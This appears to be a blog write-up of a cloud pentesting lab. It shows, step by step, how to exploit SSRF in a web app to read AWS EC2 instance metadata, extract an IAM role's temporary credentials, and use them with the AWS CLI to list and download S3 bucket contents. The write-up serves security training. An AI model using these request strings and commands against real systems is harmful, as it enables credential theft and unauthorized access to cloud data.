Cloud Pentesting: 02_AWS [ SSRF to AWS Metadata to S3 Access ]

on

 

🎯 Objective

Exploit a Server-Side Request Forgery (SSRF) vulnerability to access AWS EC2 instance metadata, extract temporary credentials, and access an S3 bucket.


Preconditions

  • SSRF vulnerability in web app endpoint (e.g., name=http://...)

  • Target is hosted on an EC2 instance

  • Instance has an IAM role attached with S3 access


 Step-by-Step

 1. Confirm SSRF

Inject external URL you control (optional, for validation):

    GET /status/status.php?name=http://example.com

Check for:

  • Server response delay

  • Log hit (if external URL monitored)

2. Access EC2 Metadata Root

    GET /status/status.php?name=http://169.254.169.254/latest/meta-data/

  Expected Output: 
    ami-id
    hostname
    iam/
    instance-id
    ...

3. Find IAM Role Name
    
    GET /status/status.php?name=http://169.254.169.254/latest/meta-data/iam/security-credentials/

    Expected output: 

    LabInstanceRole


4. Extract Temporary Credentials

    
GET /status/status.php?name=http://169.254.169.254/latest/meta-data/iam/security-credentials/LabInstanceRole

    Expected JSON output:

{
  "AccessKeyId": "AKIA...",
  "SecretAccessKey": "abc...",
  "Token": "FQoGZXIvYXdzE...",
  "Expiration": "2025-05-23T12:34:56Z"
}




=================================================


5. Set Up AWS CLI Session

    
aws configure --profile meta    
AWS Access Key ID [None]: A***********
AWS Secret Access Key [None]: **********************HGAT479SB************
Default region name [None]: us-west-2
Default output format [None]: json


aws configure set aws_session_token "<<paste complete token <<inside the quotes>>>>" --profile meta



5. Access S3 bucket

5.1. To verify the whoami: 
aws sts get-caller-identity --profile meta

Output: 
{
    "UserId": "**************1",
    "Account": "*******",
    "Arn": "arn:aws:sts::4234324234:assumed-role/dummys3Access/i-hksj4kj22kehd9fjf0"
}

5.2. URLs can be found in the web app sources. check on the homepage: view souce

    aws s3 ls s3://<<url>>/ --profile meta

   Output
                           PRE backup/
                           PRE web/

5.3. aws s3 cp s3://<<url>>/flag.txt . --profile meta


Note:  you can always navigate in the S3 buckets by using step 5.2 , just append the directory name or complete path . 











































































































Comments

Post a Comment